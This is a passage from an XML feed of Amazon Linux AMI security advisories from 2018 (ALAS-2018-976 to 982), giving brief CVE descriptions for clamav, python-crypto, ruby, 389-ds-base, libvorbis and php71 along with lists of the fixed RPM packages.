</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6574" title="" id="CVE-2018-6574" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7187" title="" id="CVE-2018-7187" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-tests" version="1.9.4" release="2.44.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.9.4-2.44.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.9.4" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.9.4-2.44.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.9.4" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.9.4-2.44.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.9.4" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.9.4-2.44.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.9.4" release="2.44.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.9.4-2.44.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.9.4" release="2.44.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.9.4-2.44.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.9.4" release="2.44.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.9.4-2.44.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.9.4" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.9.4-2.44.amzn1.i686.rpm</filename></package><package name="golang" version="1.9.4" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.9.4-2.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2018-976</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-976: medium priority package update for clamav</title><issued date="2018-03-21 22:24:00" /><updated date="2018-03-23 17:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1000085:
CVE-2018-0202:
CVE-2017-6419:
mspack/lzxd.c in libmspack 0.5alpha, as used in ClamAV 0.99.2, allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted CHM file.
1483909:
CVE-2017-6419 libmspack, clamav: heap-based buffer overflow in mspack/lzxd.c
CVE-2017-11423:
The cabd_read_string function in mspack/cabd.c in libmspack 0.5alpha, as used in ClamAV 0.99.2 and other products, allows remote attackers to cause a denial of service (stack-based buffer over-read and application crash) via a crafted CAB file.
1472776:
CVE-2017-11423 libmspack, clamav: Stack-based buffer over-read in cabd_read_string function
CVE-2012-6706:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6706" title="" id="CVE-2012-6706" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11423" title="" id="CVE-2017-11423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6419" title="" id="CVE-2017-6419" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0202" title="" id="CVE-2018-0202" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000085" title="" id="CVE-2018-1000085" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-milter-sysvinit" version="0.99.4" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-milter-sysvinit-0.99.4-1.29.amzn1.noarch.rpm</filename></package><package name="clamav-devel" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav-update" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav-server-sysvinit" version="0.99.4" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-server-sysvinit-0.99.4-1.29.amzn1.noarch.rpm</filename></package><package name="clamav-server" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-server-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.99.4" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.99.4-1.29.amzn1.noarch.rpm</filename></package><package name="clamav-data-empty" version="0.99.4" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-empty-0.99.4-1.29.amzn1.noarch.rpm</filename></package><package 
name="clamav-debuginfo" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav-scanner-sysvinit" version="0.99.4" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-sysvinit-0.99.4-1.29.amzn1.noarch.rpm</filename></package><package name="clamav-scanner" version="0.99.4" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-0.99.4-1.29.amzn1.noarch.rpm</filename></package><package name="clamav-db" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav-data" version="0.99.4" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.99.4-1.29.amzn1.noarch.rpm</filename></package><package name="clamd" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav-milter" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav-lib" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.99.4" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.99.4-1.29.amzn1.i686.rpm</filename></package><package name="clamd" version="0.99.4" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.99.4-1.29.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.99.4" release="1.29.amzn1" epoch="0" 
arch="i686"><filename>Packages/clamav-update-0.99.4-1.29.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.99.4" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.99.4-1.29.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.99.4" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.99.4-1.29.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.99.4" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.99.4-1.29.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.99.4" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.99.4-1.29.amzn1.i686.rpm</filename></package><package name="clamav-server" version="0.99.4" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-server-0.99.4-1.29.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.99.4" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.99.4-1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-977</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-977: medium priority package update for python-crypto</title><issued date="2018-03-21 22:26:00" /><updated date="2018-03-23 17:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-6594:
lib/Crypto/PublicKey/ElGamal.py in PyCrypto through 2.6.1 generates weak ElGamal key parameters, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for PyCrypto&#039;s ElGamal implementation.
1542313:
CVE-2018-6594 python-crypto: Weak ElGamal key parameters in PublicKey/ElGamal.py allow attackers to obtain sensitive information by reading ciphertext
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6594" title="" id="CVE-2018-6594" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-crypto" version="2.6.1" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-crypto-2.6.1-1.15.amzn1.x86_64.rpm</filename></package><package name="python27-crypto" version="2.6.1" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-crypto-2.6.1-1.15.amzn1.x86_64.rpm</filename></package><package name="python-crypto-debuginfo" version="2.6.1" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-crypto-debuginfo-2.6.1-1.15.amzn1.x86_64.rpm</filename></package><package name="python-crypto-debuginfo" version="2.6.1" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python-crypto-debuginfo-2.6.1-1.15.amzn1.i686.rpm</filename></package><package name="python27-crypto" version="2.6.1" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python27-crypto-2.6.1-1.15.amzn1.i686.rpm</filename></package><package name="python26-crypto" version="2.6.1" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python26-crypto-2.6.1-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-978</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-978: medium priority package update for ruby24 ruby22 ruby23</title><issued date="2018-03-21 22:27:00" /><updated date="2018-03-23 17:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-0903:
A vulnerability was found where the rubygems module was vulnerable to unsafe YAML deserialization when inspecting a gem. Applications that inspect gem files without installing them can be tricked into executing arbitrary code in the context of the ruby interpreter.
1500488:
CVE-2017-0903 rubygems: Unsafe object deserialization through YAML formatted gem specifications
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0903" title="" id="CVE-2017-0903" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby22-doc" version="2.2.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-doc-2.2.9-1.10.amzn1.noarch.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.9" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-debuginfo-2.2.9-1.10.amzn1.x86_64.rpm</filename></package><package name="rubygem22-psych" version="2.0.8.1" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-psych-2.0.8.1-1.10.amzn1.x86_64.rpm</filename></package><package name="ruby22-irb" version="2.2.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-irb-2.2.9-1.10.amzn1.noarch.rpm</filename></package><package name="ruby22-devel" version="2.2.9" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-devel-2.2.9-1.10.amzn1.x86_64.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-io-console-0.4.3-1.10.amzn1.x86_64.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.10.amzn1.x86_64.rpm</filename></package><package name="ruby22-libs" version="2.2.9" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-libs-2.2.9-1.10.amzn1.x86_64.rpm</filename></package><package name="ruby22" version="2.2.9" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-2.2.9-1.10.amzn1.x86_64.rpm</filename></package><package name="rubygems22-devel" version="2.4.5.2" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-devel-2.4.5.2-1.10.amzn1.noarch.rpm</filename></package><package name="rubygems22" 
version="2.4.5.2" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-2.4.5.2-1.10.amzn1.noarch.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.10.amzn1.i686.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-io-console-0.4.3-1.10.amzn1.i686.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.9" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-debuginfo-2.2.9-1.10.amzn1.i686.rpm</filename></package><package name="ruby22-libs" version="2.2.9" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-libs-2.2.9-1.10.amzn1.i686.rpm</filename></package><package name="ruby22-devel" version="2.2.9" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-devel-2.2.9-1.10.amzn1.i686.rpm</filename></package><package name="rubygem22-psych" version="2.0.8.1" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-psych-2.0.8.1-1.10.amzn1.i686.rpm</filename></package><package name="ruby22" version="2.2.9" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-2.2.9-1.10.amzn1.i686.rpm</filename></package><package name="ruby24-doc" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-doc-2.4.3-1.30.5.amzn1.noarch.rpm</filename></package><package name="rubygems24-devel" version="2.6.14" release="1.30.5.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-devel-2.6.14-1.30.5.amzn1.noarch.rpm</filename></package><package name="ruby24" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.3-1.30.5.amzn1.x86_64.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.5.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-1.30.5.amzn1.x86_64.rpm</filename></package><package name="ruby24-libs" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.3-1.30.5.amzn1.x86_64.rpm</filename></package><package name="ruby24-irb" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-irb-2.4.3-1.30.5.amzn1.noarch.rpm</filename></package><package name="rubygems24" version="2.6.14" release="1.30.5.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.14-1.30.5.amzn1.noarch.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="1.30.5.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-1.30.5.amzn1.noarch.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.3-1.30.5.amzn1.x86_64.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.0" release="1.30.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.0-1.30.5.amzn1.x86_64.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-1.30.5.amzn1.x86_64.rpm</filename></package><package name="ruby24-devel" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-devel-2.4.3-1.30.5.amzn1.x86_64.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-1.30.5.amzn1.x86_64.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.5.amzn1.x86_64.rpm</filename></package><package name="ruby24-libs" version="2.4.3" release="1.30.5.amzn1" epoch="0" 
arch="i686"><filename>Packages/ruby24-libs-2.4.3-1.30.5.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.5.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.5.amzn1.i686.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.5.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-psych-2.2.2-1.30.5.amzn1.i686.rpm</filename></package><package name="ruby24-devel" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-devel-2.4.3-1.30.5.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.3-1.30.5.amzn1.i686.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.0" release="1.30.5.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.0-1.30.5.amzn1.i686.rpm</filename></package><package name="ruby24" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-2.4.3-1.30.5.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.5.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-1.30.5.amzn1.i686.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.5.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-json-2.0.4-1.30.5.amzn1.i686.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.18.amzn1.x86_64.rpm</filename></package><package name="ruby23" version="2.3.6" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-2.3.6-1.18.amzn1.x86_64.rpm</filename></package><package name="ruby23-libs" version="2.3.6" release="1.18.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ruby23-libs-2.3.6-1.18.amzn1.x86_64.rpm</filename></package><package name="ruby23-irb" version="2.3.6" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-irb-2.3.6-1.18.amzn1.noarch.rpm</filename></package><package name="rubygems23" version="2.5.2.2" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-2.5.2.2-1.18.amzn1.noarch.rpm</filename></package><package name="ruby23-doc" version="2.3.6" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-doc-2.3.6-1.18.amzn1.noarch.rpm</filename></package><package name="rubygem23-psych" version="2.1.0.1" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-psych-2.1.0.1-1.18.amzn1.x86_64.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-io-console-0.4.5-1.18.amzn1.x86_64.rpm</filename></package><package name="rubygem23-did_you_mean" version="1.0.0" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem23-did_you_mean-1.0.0-1.18.amzn1.noarch.rpm</filename></package><package name="rubygem23-json" version="1.8.3.1" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-json-1.8.3.1-1.18.amzn1.x86_64.rpm</filename></package><package name="rubygems23-devel" version="2.5.2.2" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-devel-2.5.2.2-1.18.amzn1.noarch.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.6" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-debuginfo-2.3.6-1.18.amzn1.x86_64.rpm</filename></package><package name="ruby23-devel" version="2.3.6" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-devel-2.3.6-1.18.amzn1.x86_64.rpm</filename></package><package name="rubygem23-json" version="1.8.3.1" release="1.18.amzn1" epoch="0" 
arch="i686"><filename>Packages/rubygem23-json-1.8.3.1-1.18.amzn1.i686.rpm</filename></package><package name="rubygem23-psych" version="2.1.0.1" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-psych-2.1.0.1-1.18.amzn1.i686.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.6" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-debuginfo-2.3.6-1.18.amzn1.i686.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.18.amzn1.i686.rpm</filename></package><package name="ruby23-libs" version="2.3.6" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-libs-2.3.6-1.18.amzn1.i686.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-io-console-0.4.5-1.18.amzn1.i686.rpm</filename></package><package name="ruby23-devel" version="2.3.6" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-devel-2.3.6-1.18.amzn1.i686.rpm</filename></package><package name="ruby23" version="2.3.6" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-2.3.6-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-980</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-980: important priority package update for 389-ds-base</title><issued date="2018-04-05 15:55:00" /><updated date="2018-04-05 23:07:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1054:
An out-of-bounds memory read flaw was found in the way 389-ds-base handled certain LDAP search filters. A remote, unauthenticated attacker could potentially use this flaw to make ns-slapd crash via a specially crafted LDAP request, thus resulting in denial of service.
1537314:
CVE-2018-1054 389-ds-base: remote Denial of Service (DoS) via search filters in SetUnicodeStringFromUTF_8 in collate.c
CVE-2017-15135:
It was found that 389-ds-base did not always handle internal hash comparison operations correctly during the authentication process. A remote, unauthenticated attacker could potentially use this flaw to bypass the authentication process under very rare and specific circumstances.
1525628:
CVE-2017-15135 389-ds-base: Authentication bypass due to lack of size check in slapi_ct_memcmp function in ch_malloc.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15135" title="" id="CVE-2017-15135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1054" title="" id="CVE-2018-1054" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-devel" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.6.1-28.54.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.6.1-28.54.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.6.1-28.54.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.6.1-28.54.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.6.1-28.54.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.6.1-28.54.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.6.1-28.54.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.6.1-28.54.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.6.1" release="28.54.amzn1" epoch="0" 
arch="i686"><filename>Packages/389-ds-base-libs-1.3.6.1-28.54.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.6.1-28.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-981</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-981: critical priority package update for libvorbis</title><issued date="2018-04-05 15:57:00" /><updated date="2018-04-05 23:07:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5146:
An out of bounds write flaw was found in the processing of vorbis audio data. A maliciously crafted file or audio stream could cause the application to crash or, potentially, execute arbitrary code.
1557221:
CVE-2018-5146 Mozilla: Vorbis audio processing out of bounds write (MFSA 2018-08)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5146" title="" id="CVE-2018-5146" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libvorbis-devel-docs" version="1.3.3" release="8.7.amzn1" epoch="1" arch="noarch"><filename>Packages/libvorbis-devel-docs-1.3.3-8.7.amzn1.noarch.rpm</filename></package><package name="libvorbis-devel" version="1.3.3" release="8.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/libvorbis-devel-1.3.3-8.7.amzn1.x86_64.rpm</filename></package><package name="libvorbis" version="1.3.3" release="8.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/libvorbis-1.3.3-8.7.amzn1.x86_64.rpm</filename></package><package name="libvorbis-debuginfo" version="1.3.3" release="8.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/libvorbis-debuginfo-1.3.3-8.7.amzn1.x86_64.rpm</filename></package><package name="libvorbis-devel" version="1.3.3" release="8.7.amzn1" epoch="1" arch="i686"><filename>Packages/libvorbis-devel-1.3.3-8.7.amzn1.i686.rpm</filename></package><package name="libvorbis" version="1.3.3" release="8.7.amzn1" epoch="1" arch="i686"><filename>Packages/libvorbis-1.3.3-8.7.amzn1.i686.rpm</filename></package><package name="libvorbis-debuginfo" version="1.3.3" release="8.7.amzn1" epoch="1" arch="i686"><filename>Packages/libvorbis-debuginfo-1.3.3-8.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-982</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-982: important priority package update for php71</title><issued date="2018-03-27 21:37:00" /><updated date="2018-03-28 22:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7584:
In PHP through 5.6.33, 7.0.x before 7.0.28, 7.1.x through 7.1.14, and 7.2.x through 7.2.2, there is a stack-based buffer under-read while parsing an HTTP response in the php_stream_url_wrap_http_ex function in ext/standard/http_fopen_wrapper.c. This subsequently results in copying a large string.
1551039:
CVE-2018-7584 php: Stack-based buffer under-read in ext/standard/http_fopen_wrapper.c:php_stream_url_wrap_http_ex function when parsing HTTP response allows denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7584" title="" id="CVE-2018-7584" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php71-common" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-dba" 